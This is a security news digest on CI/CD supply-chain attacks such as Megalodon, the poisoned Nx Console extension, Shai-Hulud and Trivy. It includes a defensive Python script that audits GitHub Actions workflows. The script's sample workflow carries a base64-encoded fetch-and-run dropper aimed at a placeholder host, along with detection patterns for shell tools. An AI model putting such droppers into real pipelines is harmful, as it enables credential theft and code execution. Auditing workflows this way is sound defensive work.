< ciso brief />

All news with the #ci cd security tag

40 articles

Supply Chain Intrusions Target Developer Tooling

🔒 CISA is addressing multiple software supply chain intrusions that target developer ecosystems, specifically CI/CD pipelines, code extensions, and workflows. A malicious release of the Nx Console VS Code extension (version 18.95.0), made possible by an earlier compromise of Nx developer systems, was used to gain access to a GitHub employee's device, leading to unauthorized access to and exfiltration of internal repositories; the issue was assigned CVE-2026-48027. The "Megalodon" campaign injected malicious GitHub Actions workflows to harvest CI/CD secrets, cloud credentials, and tokens. CISA urges organizations to detect and remediate potential compromises and to implement its recommended best practices for package repositories and CI/CD security.

Megalodon campaign backdoors GitHub Actions at scale

🔒 Researchers at SafeDep uncovered the Megalodon campaign, which pushed 5,718 malicious commits into 5,561 public GitHub repositories during a six-hour window on May 18. The attackers modified GitHub Actions workflows to embed base64-encoded bash payloads designed to exfiltrate CI-exposed secrets such as cloud credentials, SSH keys, and OIDC tokens. Using compromised personal access tokens or deploy keys and forged author identities such as build-bot, they committed the changes directly, without pull requests, and delivered two payload variants: one that ran on every push and one triggered via workflow_dispatch.

Embed AI Governance into Release Infrastructure

🚦 The author argues that traditional post-hoc compliance reviews fail for AI because AI systems change continuously. Drawing on research into Chinese and EU approaches, the piece recommends embedding governance into CI/CD pipelines so that model cards, data lineage and risk evaluations are generated and enforced as deployment gates. It also urges treating agent identity as a first-class security control and positioning compliance as operational release infrastructure rather than as a review layer.

Google Cloud launches AppLifecycle Manager Feature Flags

🔔 AppLifecycle Manager Feature Flags (ALM FF) enters public preview as a rule-based service to decouple feature releases from code deployments. By using toggles and the Common Expression Language (CEL), teams can perform gradual rollouts, instant kill-switches, and percentage-based traffic ramps. String-type flags enable dynamic configuration for applications, including LLM prompts, while OpenFeature compatibility avoids vendor lock-in.

GitHub Breach Linked to Malicious Nx Console Extension

🔒 GitHub said attackers accessed approximately 3,800 internal repositories after a developer installed a malicious version of the Nx Console Visual Studio Code extension that had been poisoned during last week's TanStack npm supply-chain attack. The intrusion, linked to the actor known as TeamPCP, used stolen CI/CD credentials to move into multiple projects, including UiPath, Guardrails AI and OpenSearch. GitHub secured the compromised device, rotated high-impact secrets, and is continuing log analysis and monitoring to detect follow-on activity.

GitHub Internal Repositories Breached via VS Code Extension

🔒 GitHub confirmed an intrusion into internal repositories after an employee device was compromised by a poisoned version of the Nx Console VS Code extension published as nrwl.angular-console. The attacker, tracked as TeamPCP, exfiltrated approximately 3,800 repositories; GitHub says it rotated critical secrets and is monitoring for follow-on activity. The trojanized release was available for only 18 minutes but delivered a credential stealer targeting 1Password, Anthropic Claude Code, npm, GitHub and AWS.

Mini Shai Hulud: antv npm Packages Compromised in CI/CD

🔒 Microsoft disclosed an active supply-chain attack that compromised an @antv npm maintainer account and published malicious versions of charting libraries, including echarts-for-react. The obfuscated ~499 KB JavaScript payload executes during npm install and targets GitHub Actions runners to harvest secrets from GitHub, AWS, HashiCorp Vault, npm, Kubernetes and 1Password by scraping process memory and enumerating secret stores. The campaign leverages privilege escalation, dual-channel exfiltration, and SLSA provenance forgery to evade detection; GitHub removed malicious packages and invalidated exposed tokens.

Grafana breach traced to missed GitHub token rotation

🔐 Grafana confirmed that its recent data breach stemmed from a single missed GitHub workflow token, exfiltrated after malicious TanStack npm packages executed in its CI/CD environment. The company detected the intrusion on May 1, rotated most tokens, and launched its incident response, but one token was overlooked and gave the attackers repository access. Grafana says source code was not altered and no customer production systems were impacted.

Amazon ECS adds pause-and-continue deployment hooks

⏸️ Amazon Elastic Container Service (Amazon ECS) now supports configurable pause points in service deployments, allowing operators to halt progression at critical stages for manual approvals, tests, or operational checks. ECS emits Amazon EventBridge events at pause points and provides the ContinueServiceDeployment API to resume or roll back. Pause hooks support timeouts of up to 14 days and configurable timeout actions. The feature integrates with native deployment strategies and is available across commercial and GovCloud Regions.

GitHub Actions Compromised via Imposter Commit Attack

🔒 Security researchers from StepSecurity report that the popular GitHub Action actions-cool/issues-helper was hijacked by attackers who moved its existing tags to imposter commits in an adversary-controlled fork. The malicious commit downloads the Bun JavaScript runtime, reads memory from the Runner.Worker process to harvest CI/CD credentials, and exfiltrates them to an attacker-controlled domain. A second action, actions-cool/maintain-one-comment, had 15 tags altered in the same way. GitHub has disabled access to the repository; only workflows that pinned the action to a full commit SHA were unaffected, because a moved tag cannot redirect a SHA reference.
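The Megalodon and imposter-commit entries above describe two things a workflow audit should catch: `run:` steps that decode a base64 blob into a shell, and third-party actions referenced by a mutable tag instead of a full commit SHA (the same pinning advice CERT-EU gives for Trivy further down). The following is an added example written for this page, not code from SafeDep, StepSecurity or any cited project. It is regex-based so it needs no YAML library, and the sample workflow, the placeholder 40-hex SHA and the example.invalid URL in the constructed payload are all assumptions.

```python
"""Static audit of GitHub Actions workflow text for two patterns seen in the
entries above: actions referenced by a mutable tag rather than a full commit
SHA (moved-tag / imposter-commit attacks), and `run:` steps that decode a
base64 blob into a shell (Megalodon-style payloads).  Constructed example."""
import base64
import binascii
import re
import sys

# `uses:` step reference, with optional list dash and quotes.
USES_RE = re.compile(r"""^\s*-?\s*uses:\s*['"]?([^\s'"#]+)""")
# A full 40-hex commit SHA is the only immutable form of an action reference.
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")
# The idiom itself: decode base64 and pipe straight into a shell.
DECODE_PIPE_RE = re.compile(r"base64\s+(?:-d|--decode)\b.*\|\s*(?:ba)?sh\b")
# Candidate base64 blobs worth decoding (24+ chars of the base64 alphabet).
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# What a decoded blob looks like when it is a dropper rather than data.
SHELLY_RE = re.compile(r"\b(?:curl|wget|bash|sh|eval|python3?|nc)\b")


def find_unpinned_uses(text):
    """Return [(line_no, ref)] for every `uses:` not pinned to a full SHA."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = USES_RE.match(line)
        if not m:
            continue
        ref = m.group(1)
        # Local composite actions and docker images are not tag-pinnable here.
        if ref.startswith("./") or ref.startswith("docker://"):
            continue
        _, _, version = ref.partition("@")
        if not FULL_SHA_RE.fullmatch(version):
            findings.append((n, ref))
    return findings


def find_decoded_shell_payloads(text):
    """Return [(line_no, reason)] for lines that decode base64 into a shell,
    or that embed a base64 blob which itself decodes to a shell one-liner."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if USES_RE.match(line):
            continue  # pinned SHAs look like blobs; they are handled above
        if DECODE_PIPE_RE.search(line):
            findings.append((n, "base64 decode piped into a shell"))
            continue
        for blob in B64_BLOB_RE.findall(line):
            try:
                decoded = base64.b64decode(blob, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue  # not valid base64, or not text once decoded
            if SHELLY_RE.search(decoded):
                findings.append((n, f"embedded blob decodes to: {decoded[:60]!r}"))
                break
    return findings


def audit(text):
    """Run both checks over one workflow file's text."""
    return {"unpinned": find_unpinned_uses(text),
            "payloads": find_decoded_shell_payloads(text)}


# Constructed payload modelled on the described pattern; example.invalid is a
# reserved name that never resolves, so nothing here contacts the network.
DEMO_PAYLOAD = base64.b64encode(b"curl -s https://example.invalid/x | sh").decode()

# Constructed sample workflow (assumption, not a real repository). The 40-hex
# value is a placeholder, not an actual setup-node commit.
SAMPLE_WORKFLOW = f"""\
name: build
on: [push, workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567
      - uses: actions-cool/issues-helper@v3
      - name: build
        run: npm ci && npm test
      - name: post-build
        run: echo {DEMO_PAYLOAD} | base64 -d | bash
"""

if __name__ == "__main__":
    # Audit workflow files named on the command line, or the embedded sample.
    sources = [(p, open(p).read()) for p in sys.argv[1:]] or [("<sample>", SAMPLE_WORKFLOW)]
    for name, text in sources:
        result = audit(text)
        for n, ref in result["unpinned"]:
            print(f"{name}:{n}: unpinned action {ref}")
        for n, why in result["payloads"]:
            print(f"{name}:{n}: {why}")
```

Run it as `python audit_workflows.py .github/workflows/*.yml` (script name is an assumption). On the sample it reports lines 7 and 9 as unpinned and line 13 as a decode-to-shell step. Two caveats: `base64 -d` piped to a shell is an idiom, not proof of malice, so treat hits as review queues rather than verdicts; and multi-line `run: |` blocks are scanned one line at a time, so a blob split across lines is missed. SHA pinning only helps if the SHA was taken from the upstream repository, not from a fork, which is why the pinned reference should be verified against the action's own commit history when it is first added.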

Kaspersky Container Security: Practical Team Insights

🔒 Kaspersky Container Security (KCS) is presented as a comprehensive platform that reaches beyond registry image scanning to secure container workflows across development and production. The Product Security Team uses KCS in CI/CD pipelines, registry correlation, and cluster runtime monitoring to tie findings to specific artifacts, pipelines, and scan times. KCS computes risk ratings, supports SBOM processing, and produces reports in SARIF, CycloneDX, SPDX and other standard formats to integrate with AppSec and internal tooling.

Ship Code Fast with Gemini CLI CI/CD Extension

🚀 The Gemini CLI CI/CD extension lets developers deploy functional apps directly from a terminal, closing the gap between local prototyping and production pipelines. It performs a pre-deployment secret scan, analyzes project files, and can containerize using buildpacks before deploying to Cloud Run or Cloud Storage. For production workflows it can design CI/CD pipelines, provision resources, and generate Cloud Build YAML and triggers.

Quasar Linux RAT Targets Developers' Credentials, Pipelines

🔒 Trend Micro researchers disclosed a previously undocumented Linux implant dubbed Quasar Linux RAT (QLNX) that targets developers and DevOps credentials to establish a stealthy foothold. The fileless loader masquerades as kernel threads, erases logs, and persists via seven or more mechanisms such as systemd, crontab and .bashrc injection. Its credential harvester extracts secrets from high-value files including .npmrc, .pypirc, .git-credentials, .aws/credentials, .kube/config, .docker/config.json and .env, enabling registry poisoning, cloud access or CI/CD pivoting. QLNX also installs PAM inline-hook backdoors, a userland LD_PRELOAD rootkit and an eBPF kernel component to hide artifacts while supporting 58 remote commands and data exfiltration.

Critical RCE Vulnerability Discovered in Google Gemini CLI

🔒 Researchers disclosed a maximum-severity remote code execution (RCE) vulnerability in @google/gemini-cli and the associated GitHub Action, which could load untrusted workspace configurations in headless CI environments. Google issued patches in 0.39.1 and 0.40.0-preview.3 and updated the run-gemini-cli Action to 0.1.22, removing implicit workspace trust and enforcing tool allowlists. Teams that pin CLI versions are advised to upgrade and to review their workspace configurations immediately.

Shai-Hulud Worm Elevates npm Supply-Chain Risk Globally

🔒 Unit 42 describes a fundamental shift in the npm threat landscape following the September 2025 Shai‑Hulud worm and subsequent 2026 incidents. Adversaries now harvest npm and GitHub tokens to persist inside CI/CD pipelines, deploy dormant multi‑stage payloads, and automatically republish backdoored packages. The report attributes a broad, coordinated campaign to TeamPCP, documents propagation via Docker Hub, GitHub Actions and VS Code extensions, and recommends mitigations such as credential rotation, egress filtering, and dependency pinning.

Trojanized Bitwarden CLI in Supply Chain Attack Uncovered

🛡️ A malicious npm release of the Bitwarden CLI (version 2026.4.0) was briefly published after attackers compromised a GitHub Action in the project's CI/CD pipeline. The trojanized package included a loader that installs the Bun runtime and executes a payload designed to harvest cloud, development, and CI credentials. Bitwarden reported no evidence of user vault access; the package was removed within roughly 1.5 hours, the compromised access was revoked, and remediation is under way.

Amazon SageMaker Unified Studio launches CI/CD CLI

🔧 Amazon has released aws-smus-cicd-cli, an open-source command-line tool that automates deployment of multi-service data and AI applications built in SageMaker Unified Studio. Teams define an application once in a manifest.yaml, and the CLI substitutes stage-specific settings, provisions resources in dependency order, and runs post-deployment tests. Four lifecycle commands (describe, bundle, deploy, test) integrate with existing CI/CD pipelines to reduce configuration drift and speed up releases. The CLI is available at no additional cost in supported Regions; you pay only for the AWS resources provisioned during deployment.

Flagship: Cloudflare's Native Feature Flag Service

🧭 Cloudflare introduces Flagship, a native feature-flag service built on the CNCF standard OpenFeature that evaluates flags at the edge using Workers, Durable Objects, and KV. The Worker binding performs in-isolate evaluations with typed accessors and full evaluation details, avoiding external HTTP calls and reducing latency. Flagship centralizes flag storage, change auditing, percentage rollouts, and nested targeting rules, and is now available in private beta to help teams safely ship autonomous or AI-assisted code.

Protecting the Software Supply Chain: 2026 Guidance

🔒 Recent weeks have seen multiple high-profile supply chain compromises, including malicious modifications to Axios and repository hijacks by TeamPCP that impacted tools such as Trivy. These incidents highlight how widely used libraries can rapidly propagate risk and complicate inventory and remediation efforts. The report emphasizes securing identity and CI/CD pipelines, maintaining accurate software inventories, prioritizing rapid patching, and reinforcing fundamentals like segmentation, robust logging, and multi-factor authentication to limit impact and lateral movement.

CERT-EU Attributes Europa.eu Breach to Trivy Supply-Chain

🔒 CERT-EU traced the Europa.eu data theft to a supply-chain compromise of Trivy, the open-source vulnerability scanner, which exposed an AWS API key and led to the theft of approximately 350 GB of web data (91.7 GB compressed). The actor, publicly linked to TeamPCP, exploited a GitHub Actions misconfiguration (CVE-2026-33634) to make CI/CD pipelines pull credential-stealing malware via manipulated Trivy tags. Stolen material was later passed to ShinyHunters. CERT-EU urges updating to safe Trivy releases, rotating cloud credentials, auditing CI/CD usage, and pinning GitHub Actions to immutable full commit SHA-1 hashes rather than tags.